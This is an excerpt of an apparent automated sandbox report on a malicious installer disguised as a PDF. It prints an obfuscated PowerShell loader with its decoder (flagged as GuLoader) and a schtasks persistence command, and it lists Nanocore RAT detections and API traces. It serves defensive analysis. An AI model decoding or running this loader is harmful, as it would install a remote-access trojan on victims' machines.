P5DiEUn1Sp0Ud1DiDRe0 T6Ny5Ar6Rn5 k2re3 S5 N1Ln9Ke1caBFa0 T6Ad1UnAMo1 O3 C1GyB F1 P3Nu1Dd8Al0Pr2 K1SeFSk1Oa8 B1An1Re5Dr6wo5Su2An0Ov4Le1Mi9 P0 s5 M1UsF R1Po8Nr1Pi3 A0Tr4Ga0 F5St4Ti0Pa5 CF G5 TA D5St6Ra5 LEPr3Ma1Uf3Ra2 M2Bo2 L5 B6Va3Co6Te5BlESp2 SDno3BiF L1Ei8Ko0En2Mu4Ma5st4Pe4Cr2 UB A5ReA B5Ca6ch2NoDRu3BeFMi1Fo8Au0 I2Pr4Ga5No4Kn4to2EnBUn5 FABu5Ru6 S2 NDSt3AfFDe1Fi8 S0 O2 O4Be5 K4Br4 T2InBMu5TrA A5Ro6Bi2 RDUd3SkFLi1St8 C0Bl2Il4 R5 Q4Co4 O2EnBAn5ReAKa5 F6Pl2HaDSt3JaF f1 K8ko0 W2 T4 D5 Z4kr4Re2 ABOb5 PF o5 B6ti5ZaEPo2 FD E3 PFIn1Fr8Su0 S2Un2 H6ro0Hv2Br0Co4Go2UnBPr5UgFBe5 LFrn5DiF H' S)Pr;Ra&Ha(Sk`$bor Vo KsFeiWinUdeSkrFosSl7Pr)Un Un(noBSjr Ru adKogknoNomcomPue A0un4Th St'Tu5Pr2Pr2Ke5Sc1 C3 U1ToB S1 S7 H1 P3 H1 A9Hy0Fr5Vi0 h2Co1Pe9Tv1 AB t1Ma7Et0Ab2Ud1 B7Or5Lo6 M4NeB A5Kn6Un5An2 S3 T2In1 SF N1Pr7re0Ia4Un0 SFUd5Di8To3diFPl1He8 B0 R0 C1 R9gl1 TD G1St3 B5 kEKa5SlB B4 B7 a5ViA r4 U6 O5 RA s4 N0Lo4Un2 d5 AA T4Ve6 P5UdAAr5Ba6 P4ko1Ra4 T5 T4 T7 I4SpFOm4 HF t4En0 G4Na7 C4Ca0 I5KnAHa4 B6 H5 DFWe'Le) v;Mi&In( S`$UnrRioDasEniBanDye ArAdsoc7Un)Ov Oa( AB sr SusudOdg So Nm Sm Ae S0Ju4 M Af' T5Fl2El3fj7En1Ba8Zo1Kl5Fl1 U3 S0Co5Ex0Tr2 L0Go4 S1LiF F1se7Ky1Pl8Je5bi6Ne4EaBUr5Sf6Tr5ek2 E2 F5 T1Ud8 S1 T7Ko0Ne6Sa0Br5Co1Un3Ti1 P0pu1ThA m1hu7Ta0 P5Fo1 WDSk1Sp3tr1So8Ka5Un8 F3ruFAn1Ko8 S0Hi0Bu1Op9 i1StD B1In3Pr5 PE K5En2Fi2 G5 K1Su3Dk1VeBTr1An7 F1Os3Li1 K9 A0Fi5 U0Co2 E1 P9Te1ExB C1Pr7sr0Be2Ny1Sm7Tr5 SAPe4Ru6An2 ME S4St4sk4Ru4Av5EnA d4pr6Te5 WAAp4 S6Lu5 gAGr4 A6 B5TeF C' b) S;Ps`$NoSPet GaFonBac KhSci PoPrnSkeSodCo2Ze= R`"""fj`$ Te LnMov R:LeLcaO SC EA RLAcAPaPEfPUnDRiA uTSaA R\ BSbok haBamScfPrlToe GlHisLueLinEls F\ Vf Fa GmSne MlSaeBesSts s\YaP Vr Ue Cg DeSon leMir Do Ru Ns A2br2Pa4Or\osAHitRoe Vi Ss UtMeiPlsCokBleNos F. ANUdo QnWe`""" I; S&Mu(Un`$ Pr Ao is JiGen SeLerBas R7 O) S Fo( TB Sr Gu Sd PgPhoBimSvmSkeAn0Uo4Al Si'Gu5 B2Be2Pa0Pr1Pi7Ar1Fo1Re0 P5 A0Da2 R1Dr3sk5Af6op4ZiBLo5 S6Br2FlDCo2 S5Sp0KoF B0po5Fo0Or2en1Aa3Om1 SBBi5Te8 L3EpF G3Ak9La5 s8 S3 L0 B1DuF d1BaA N1 F3 A2SkBSk4 BC U4 AC L2 A4Pr1Tr3 O1Fl7Sw1Er2Pi3dr7Hy1 SAEv1PrAAm3 F4No0GaF H0 I2Ka1 I3 M0My5 C5FlEHa5An2 N2sh5 A0 D2Ka1Di7 P1 D8Oc1 P5Di1UnE P1reF S1Un9 U1 E8 A1Ek3 H1 v2Sh4Co4pe5 TF E' R)Al; I`$TrISvn TfPoi GmHauKrm F=Le`$CoVMea ag Fs StKreFe.MacFio Su KnTrtpi- F1Be0 L2Ti4 S; P& F( G`$ ArGro TsUniMunFie SrUns S7Pr) I Kv(FaB srBiu PdIng ro TmEpm FeFa0So4 A s' A2 DDRa2 C5Se0SoFSp0Sk5Ko0 s2Bn1Un3 U1 RBTr5 H8 J2Ce4Ve0 C3Di1Br8 C0Te2 P1 UF U1inBPu1 P3 O5 P8 S3 DF K1No8Re0As2Ra1Sm3 D0Da4 A1Ma9Un0 S6Gs2 D5Ov1Na3Ta0 s4 R0Pr0St1OyFSa1 C5Ud1Sa3 V0Ba5 F5Ou8 U3ViB B1Al7 T0 O4 S0Su5 S1MyE R1 K7Ge1 GAla2 sBMa4 LC D4RuCBr3Sy5En1Re9 G0 O6Er0YnFFu5 LE k5 R2 C2 S0 A1qu7 T1Dj1 I0 W5pr0 C2Fi1Kr3 M5 IAFe5Kr6Ko4Lo7 M4 U6 C4Fe4Ve4 M2 t5BuABo5 D6 R5 T2Sl3 I7 S1 p8fl1sk5Ba1To3sm0Un5 L0 T2 P0Tr4Un1 MFCo1 H7Om1Fo8po5AlA u5 K6 V5 S2Ud3SlF B1Ac8si1Sk0Ma1AtF s1miBKa0Ne3 A1 NB t5FiFUd' s)Fo;va&Vi( P`$ srIno Ssimi Dn ceNerOps P7 D) B Mi(CyBAmr Eu SdChg DoMomRemJee s0 n4Sm Ve'st5 u2Sk1Fj0um1 S9ca0 P4 D1TuE F1CoF S1Oe8 T1 C2Oc0Ga4Ej1 A3Te0 P5Sa5 S6 O4MiBOv5 A6to2 VDsa2Ra5 A0PiF L0Di5 O0Sa2Pr1Su3Ri1 HB G5 C8Be2 S4Va0Ab3be1Vi8Ls0 T2Af1 PFFr1TrBPl1Bi3Sk5Hy8 V3FoF B1Sv8Fa0 E2Pa1 x3Ga0 U4 s1Pr9Un0 M6 A2 S5Le1Su3De0Ok4Sp0 C0Hj1SkFGe1fr5Mo1 h3 P0Ud5 B5 A8Po3SpBNo1Cu7 T0Bi4Ud0Fe5De1 FE P1 C7no1 DALa2 SB T4AnC C4BlCTe3 T1to1 A3Se0Bo2Fo3Af2Bi1 E3Di1AnA F1 P3He1 R1Ta1Sa7Os0Ga2 U1Sp3Ut3Wo0An1Br9 P0 T4 A3gr0Wa0Et3 p1ca8Fu1 D5 T0 N2Er1 DFRa1 p9Ov1Sk8Aa2Sl6 d1 S9 P1 UFFd1Fo8 D0Hi2 S1Gl3An0Ef4Ki5 EE J5PrEIs1Ov0Er1LeD C0Ta6 S5sk6 C5 S2Sk3 s5Rh1an9Re1udB T0 F6Ny1SuA T1Sc3 H1 FBov1an3Sk1He8 A0Ln2Bl1 HFIn1We8Wo1 K1In5Wh6Ti5Ma2 S3ReEGu1 E9Ci1FoAPe1Fe7No1Po4Je1FuF t0 L4Tr1Ru2Pr4 S7Pr4 S4 B4 H6Ne5YeFSi5AnAro5py6 A5NdE S3 U1Ps3Hm2In2Hy2 T5 M6Mu3Ro6Gl5SvESk2 KD S3AnF F1Th8Th0 M2Sk2 G6 A0 T2Gl0Ud4 D2 LBBj5 BABu5Ro6 C2 MDSp3OvFHa1Sl8 A0 N2 N2 R6Cl0 S2Do0De4Se2UnB U5KoA U5 B6 I2 UD C3BrFNo1 H8Sl0Un2 T2 E6Ra0 o2Un0 V4 O2FiB k5ApFOv5Su6 M5ViE S2psDca3MeF B1St8 G0Ma2Ps2An6 E0Ha2Bu0 E4Te2 UB D5BrF M5 SFHa5 lF R' T)Pe;fr& F(Uf`$Bir Korys KiFrnRoe BrHasTo7 D) B S( MB Fr KuRud Gg Ao Hm Im SeCo0To4Ta F'Bu5Me2Su1Vi0He1Ti9 F0 M4eu1 VECo1 gFCo1 U8 C1Re2Pi0 a4 A1Pa3Di0Sl5 S5Be8 D3PaF S1Hi8Pa0 S0 U1Mi9en1ScDHa1gl3Sv5DiEHa4 L6Sa5ReACr5Tr2 P3 A7 I1 H8Mu1Pr5Cp1Me3 B0Sh5 m0Sc2Ov0un4 M1 UFTa1 T7 S1 T8jo5AlA M4Up6Tr5 DFFo'Me)Ad# M;""";Function Nonschismatic9 { param([String]$Saleswomen); For($Antilabors=2; $Antilabors -lt $Saleswomen.Length-1; $Antilabors+=(2+1)){ $Brudgomme = $Brudgomme + $Saleswomen.Substring($Antilabors, 1); } $Brudgomme;}$Ironiernes0 = Nonschismatic9 'GeIPeEIbXIn ';&$Ironiernes0 (Nonschismatic9 $Boarspear);<#Microphytic udvandrere Trichosanthes Eudemons Longobardi Helicidae lundress #>;"
Imagebase:	0xf10000
File size:	433'152 bytes
MD5 hash:	C32CA4ACFCC635EC1EA6ED8A34DF5FAC
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000004.00000002.24024306894.000000000C1E3000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	5
Start time:	01:25:41
Start date:	05/07/2024
Path:	C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\Microsoft.NET\Framework\v2.0.50727\caspol.exe"
Imagebase:	0x6c0000
File size:	106'496 bytes
MD5 hash:	7BAE06CBE364BB42B8C34FCFB90E3EBD
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000005.00000002.28417516925.00000000229E7000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: NanoCore, Description: unknown, Source: 00000005.00000002.28417516925.00000000229E7000.00000004.00000800.00020000.00000000.sdmp, Author: Kevin Breen <kevin@techanarchy.net> Rule: Windows_Trojan_Nanocore_d8c4e3c5, Description: unknown, Source: 00000005.00000002.28417516925.00000000229E7000.00000004.00000800.00020000.00000000.sdmp, Author: unknown Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000005.00000002.28422063726.0000000023FC0000.00000004.08000000.00040000.00000000.sdmp, Author: Florian Roth Rule: MALWARE_Win_NanoCore, Description: Detects NanoCore, Source: 00000005.00000002.28422063726.0000000023FC0000.00000004.08000000.00040000.00000000.sdmp, Author: ditekSHen Rule: Windows_Trojan_Nanocore_d8c4e3c5, Description: unknown, Source: 00000005.00000002.28422063726.0000000023FC0000.00000004.08000000.00040000.00000000.sdmp, Author: unknown Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000005.00000002.28422942050.00000000244C0000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000005.00000002.28422942050.00000000244C0000.00000004.08000000.00040000.00000000.sdmp, Author: Florian Roth Rule: MALWARE_Win_NanoCore, Description: Detects NanoCore, Source: 00000005.00000002.28422942050.00000000244C0000.00000004.08000000.00040000.00000000.sdmp, Author: ditekSHen Rule: Windows_Trojan_Nanocore_d8c4e3c5, Description: unknown, Source: 00000005.00000002.28422942050.00000000244C0000.00000004.08000000.00040000.00000000.sdmp, Author: unknown Rule: Windows_Trojan_Nanocore_d8c4e3c5, Description: unknown, Source: 00000005.00000002.28397844456.00000000219A1000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
Reputation:	moderate
Has exited:	false

Show Windows behavior

Target ID:	6
Start time:	01:26:13
Start date:	05/07/2024
Path:	C:\Windows\SysWOW64\schtasks.exe
Wow64 process (32bit):	true
Commandline:	"schtasks.exe" /create /f /tn "DSL Monitor" /xml "C:\Users\user\AppData\Local\Temp\tmp39FB.tmp"
Imagebase:	0x10000
File size:	187'904 bytes
MD5 hash:	478BEAEC1C3A9417272BC8964ADD1CEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	7
Start time:	01:26:13
Start date:	05/07/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6604c0000
File size:	875'008 bytes
MD5 hash:	81CA40085FC75BABD2C91D18AA9FFA68
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	8
Start time:	01:26:14
Start date:	05/07/2024
Path:	C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\Microsoft.NET\Framework\v2.0.50727\caspol.exe 0
Imagebase:	0x7ff652800000
File size:	106'496 bytes
MD5 hash:	7BAE06CBE364BB42B8C34FCFB90E3EBD
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	9
Start time:	01:26:14
Start date:	05/07/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6604c0000
File size:	875'008 bytes
MD5 hash:	81CA40085FC75BABD2C91D18AA9FFA68
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Execution Graph

Execution Coverage:	23.3%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	20.2%
Total number of Nodes:	1327
Total number of Limit Nodes:	30

Executed Functions

Function 0040336C Relevance: 86.2, APIs: 33, Strings: 16, Instructions: 410
stringfilecomCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SetErrorMode.KERNELBASE ref: 0040338F
GetVersion.KERNEL32 ref: 00403395
lstrlenA.KERNEL32(UXTHEME,UXTHEME), ref: 004033C8
#17.COMCTL32(?,00000006,00000008,0000000A), ref: 00403405
OleInitialize.OLE32(00000000), ref: 0040340C
SHGetFileInfoW.SHELL32(0079FEE0,00000000,?,000002B4,00000000), ref: 00403428
GetCommandLineW.KERNEL32(007A7A20,NSIS Error,?,00000006,00000008,0000000A), ref: 0040343D
CharNextW.USER32(00000000,"C:\Users\user\Desktop\Certificate#U00b7pdf.exe",00000020,"C:\Users\user\Desktop\Certificate#U00b7pdf.exe",00000000,?,00000006,00000008,0000000A), ref: 00403475

Part of subcall function 00406671: GetModuleHandleA.KERNEL32(?,00000020,?,004033DE,0000000A), ref: 00406683
Part of subcall function 00406671: GetProcAddress.KERNEL32(00000000,?), ref: 0040669E

GetTempPathW.KERNEL32(00000400,C:\Users\user\AppData\Local\Temp\,?,00000006,00000008,0000000A), ref: 004035AF
GetWindowsDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\,000003FB,?,00000006,00000008,0000000A), ref: 004035C0
lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,\Temp), ref: 004035CC
GetTempPathW.KERNEL32(000003FC,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,\Temp,?,00000006,00000008,0000000A), ref: 004035E0
lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,Low), ref: 004035E8
SetEnvironmentVariableW.KERNEL32(TEMP,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,Low,?,00000006,00000008,0000000A), ref: 004035F9
SetEnvironmentVariableW.KERNEL32(TMP,C:\Users\user\AppData\Local\Temp\,?,00000006,00000008,0000000A), ref: 00403601
DeleteFileW.KERNELBASE(1033,?,00000006,00000008,0000000A), ref: 00403615

Part of subcall function 00406297: lstrcpynW.KERNEL32(?,?,00000400,0040343D,007A7A20,NSIS Error,?,00000006,00000008,0000000A), ref: 004062A4

ExitProcess.KERNEL32(00000006,?,00000006,00000008,0000000A), ref: 004036DB
OleUninitialize.OLE32(00000006,?,00000006,00000008,0000000A), ref: 004036E0
ExitProcess.KERNEL32 ref: 00403701
lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,~nsu), ref: 00403714
lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,0040A26C), ref: 00403723
lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,.tmp), ref: 0040372E
lstrcmpiW.KERNEL32(C:\Users\user\AppData\Local\Temp\,C:\Users\user\Desktop,C:\Users\user\AppData\Local\Temp\,.tmp,C:\Users\user\AppData\Local\Temp\,~nsu,"C:\Users\user\Desktop\Certificate#U00b7pdf.exe",00000000,00000006,?,00000006,00000008,0000000A), ref: 0040373A
SetCurrentDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,?,00000006,00000008,0000000A), ref: 00403756
DeleteFileW.KERNEL32(0079F6E0,0079F6E0,?,007A9000,00000008,?,00000006,00000008,0000000A), ref: 004037B0
CopyFileW.KERNEL32(007B6800,0079F6E0,00000001,?,00000006,00000008,0000000A), ref: 004037C4
CloseHandle.KERNEL32(00000000,0079F6E0,0079F6E0,?,0079F6E0,00000000,?,00000006,00000008,0000000A), ref: 004037F1
GetCurrentProcess.KERNEL32(00000028,0000000A,00000006,00000008,0000000A), ref: 00403820
OpenProcessToken.ADVAPI32(00000000), ref: 00403827
LookupPrivilegeValueW.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 0040383C
AdjustTokenPrivileges.ADVAPI32 ref: 0040385F
ExitWindowsEx.USER32(00000002,80040002), ref: 00403884
ExitProcess.KERNEL32 ref: 004038A7

Strings

TMP, xrefs: 004035FC
C:\Users\user\Desktop, xrefs: 00403733, 00403738, 00403765
C:\Users\user\AppData\Local\Skamflelsens\fameless\Imitability\Ilddaabens, xrefs: 004036BD
UXTHEME, xrefs: 004033BC, 004033C1, 004033C7
~nsu, xrefs: 0040370C
NSIS Error, xrefs: 0040342E
.tmp, xrefs: 00403728
SeShutdownPrivilege, xrefs: 00403836
C:\Users\user\AppData\Local\Temp\, xrefs: 004035A4, 004035A9, 004035BF, 004035CB, 004035DA, 004035E7, 004035F3, 004035FB, 00403711, 00403722, 0040372D, 00403739, 00403746, 00403755, 00403806
Low, xrefs: 004035E2
TEMP, xrefs: 004035F4
C:\Users\user\AppData\Local\Skamflelsens\fameless, xrefs: 00403592, 004036B2, 0040375C, 00403766
"C:\Users\user\Desktop\Certificate#U00b7pdf.exe", xrefs: 00403443, 00403449, 0040363D
\Temp, xrefs: 004035C6
Error launching installer, xrefs: 00403697
1033, xrefs: 00403610

Memory Dump Source

Source File: 00000000.00000002.23340938665.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.23340912487.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.23340965335.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.23341017704.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.23341017704.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.23341017704.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.23341017704.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.23341017704.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.23341017704.00000000007A0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.23341017704.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.23341017704.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.23341017704.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.23341017704.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.23341017704.00000000007C8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.23341761650.00000000007CB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Certificate#U00b7pdf.jbxd

Similarity

API ID: Processlstrcat$ExitFile$CurrentDeleteDirectoryEnvironmentHandlePathTempTokenVariableWindows$AddressAdjustCharCloseCommandCopyErrorInfoInitializeLineLookupModeModuleNextOpenPrivilegePrivilegesProcUninitializeValueVersionlstrcmpilstrcpynlstrlen
String ID: "C:\Users\user\Desktop\Certificate#U00b7pdf.exe"$.tmp$1033$C:\Users\user\AppData\Local\Skamflelsens\fameless$C:\Users\user\AppData\Local\Skamflelsens\fameless\Imitability\Ilddaabens$C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop$Error launching installer$Low$NSIS Error$SeShutdownPrivilege$TEMP$TMP$UXTHEME$\Temp$~nsu
API String ID: 424501083-2353104377
Opcode ID: 23254d1ad701b6aad5607cc447cd93654877cb62b49b8ea76a2aa6fa516ca3c5
Instruction ID: 91e47d7dade8a9784fbcad93861d46a8301334ec9f5f2e607ded2091cc9dec5c
Opcode Fuzzy Hash: 23254d1ad701b6aad5607cc447cd93654877cb62b49b8ea76a2aa6fa516ca3c5
Instruction Fuzzy Hash: 04D12671600300ABD720BF719D45B2B3AACEB8174AF00887FF981B62D1DB7D8955876E

Function 0040543E Relevance: 65.0, APIs: 36, Strings: 1, Instructions: 284
windowclipboardmemoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetDlgItem.USER32(?,00000403), ref: 0040549C
GetDlgItem.USER32(?,000003EE), ref: 004054AB
GetClientRect.USER32(?,?), ref: 004054E8
GetSystemMetrics.USER32(00000002), ref: 004054EF
SendMessageW.USER32(?,00001061,00000000,?), ref: 00405510
SendMessageW.USER32(?,00001036,00004000,00004000), ref: 00405521
SendMessageW.USER32(?,00001001,00000000,00000110), ref: 00405534
SendMessageW.USER32(?,00001026,00000000,00000110), ref: 00405542
SendMessageW.USER32(?,00001024,00000000,?), ref: 00405555
ShowWindow.USER32(00000000,?,0000001B,000000FF), ref: 00405577
ShowWindow.USER32(?,00000008), ref: 0040558B
GetDlgItem.USER32(?,000003EC), ref: 004055AC
SendMessageW.USER32(00000000,00000401,00000000,75300000), ref: 004055BC
SendMessageW.USER32(00000000,00000409,00000000,?), ref: 004055D5
SendMessageW.USER32(00000000,00002001,00000000,00000110), ref: 004055E1
GetDlgItem.USER32(?,000003F8), ref: 004054BA

Part of subcall function 00404243: SendMessageW.USER32(00000028,?,00000001,0040406E), ref: 00404251

GetDlgItem.USER32(?,000003EC), ref: 004055FE
CreateThread.KERNELBASE(00000000,00000000,Function_000053D2,00000000), ref: 0040560C
FindCloseChangeNotification.KERNELBASE(00000000), ref: 00405613
ShowWindow.USER32(00000000), ref: 00405637
ShowWindow.USER32(?,00000008), ref: 0040563C
ShowWindow.USER32(00000008), ref: 00405686
SendMessageW.USER32(?,00001004,00000000,00000000), ref: 004056BA
CreatePopupMenu.USER32 ref: 004056CB
AppendMenuW.USER32(00000000,00000000,00000001,00000000), ref: 004056DF
GetWindowRect.USER32(?,?), ref: 004056FF
TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 00405718
SendMessageW.USER32(?,00001073,00000000,?), ref: 00405750
OpenClipboard.USER32(00000000), ref: 00405760
EmptyClipboard.USER32 ref: 00405766
GlobalAlloc.KERNEL32(00000042,00000000), ref: 00405772
GlobalLock.KERNEL32(00000000), ref: 0040577C
SendMessageW.USER32(?,00001073,00000000,?), ref: 00405790
GlobalUnlock.KERNEL32(00000000), ref: 004057B0
SetClipboardData.USER32(0000000D,00000000), ref: 004057BB
CloseClipboard.USER32 ref: 004057C1

Strings

{, xrefs: 004056A4

Memory Dump Source

Source File: 00000000.00000002.23340938665.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.23340912487.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.23340965335.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.23341017704.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.23341017704.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.23341017704.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.23341017704.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.23341017704.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.23341017704.00000000007A0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.23341017704.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.23341017704.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.23341017704.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.23341017704.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.23341017704.00000000007C8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.23341761650.00000000007CB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Certificate#U00b7pdf.jbxd

Similarity

API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendChangeClientDataEmptyFindLockMetricsNotificationOpenSystemThreadTrackUnlock
String ID: {
API String ID: 4154960007-366298937
Opcode ID: 113d712a5db4ed50a1b1b5b673bec4020998c06132e16f1965ea7ae8cf20c9d1
Instruction ID: e2c232b37aba284685acfefcf9c5e68312cc9a4ea8bcb72f9f75ba3fcde89da4
Opcode Fuzzy Hash: 113d712a5db4ed50a1b1b5b673bec4020998c06132e16f1965ea7ae8cf20c9d1
Instruction Fuzzy Hash: 0EB15871900608FFDB119FA0DD89EAE7B79FB48354F00812AFA44BA1A0CB795E51DF58

Function 004065DA Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 14fileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNELBASE(?,007A4F70,007A4728,00405CBD,007A4728,007A4728,00000000,007A4728,007A4728,?,?,77143420,004059C9,?,C:\Users\user\AppData\Local\Temp\,77143420), ref: 004065E5
FindClose.KERNEL32(00000000), ref: 004065F1

Strings

pOz, xrefs: 004065DB

Memory Dump Source

Source File: 00000000.00000002.23340938665.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.23340912487.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.23340965335.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.23341017704.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.23341017704.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.23341017704.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.23341017704.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.23341017704.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.23341017704.00000000007A0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.23341017704.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.23341017704.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.23341017704.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.23341017704.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.23341017704.00000000007C8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.23341761650.00000000007CB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Certificate#U00b7pdf.jbxd

Similarity

API ID: Find$CloseFileFirst
String ID: pOz
API String ID: 2295610775-1820424874
Opcode ID: e01e7619722b9f30efb83f7659fa0d40dd2a6717423703156fa95c420c1e82c9
Instruction ID: b37c022bec08382a0cb03c9db181d2efdea8b1f21deeb05207148622359d6313
Opcode Fuzzy Hash: e01e7619722b9f30efb83f7659fa0d40dd2a6717423703156fa95c420c1e82c9
Instruction Fuzzy Hash: EFD01231519020AFC2001B38BD0C84B7A589F463307158B3AB4A6F11E4CB788C6296A9

Function 00403D35 Relevance: 48.3, APIs: 32, Instructions: 346
windowstringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 00403D71
ShowWindow.USER32(?), ref: 00403D8E
DestroyWindow.USER32 ref: 00403DA2
SetWindowLongW.USER32(?,00000000,00000000), ref: 00403DBE
GetDlgItem.USER32(?,?), ref: 00403DDF
SendMessageW.USER32(00000000,000000F3,00000000,00000000), ref: 00403DF3
IsWindowEnabled.USER32(00000000), ref: 00403DFA
GetDlgItem.USER32(?,00000001), ref: 00403EA8
GetDlgItem.USER32(?,00000002), ref: 00403EB2
SetClassLongW.USER32(?,000000F2,?), ref: 00403ECC
SendMessageW.USER32(0000040F,00000000,00000001,?), ref: 00403F1D
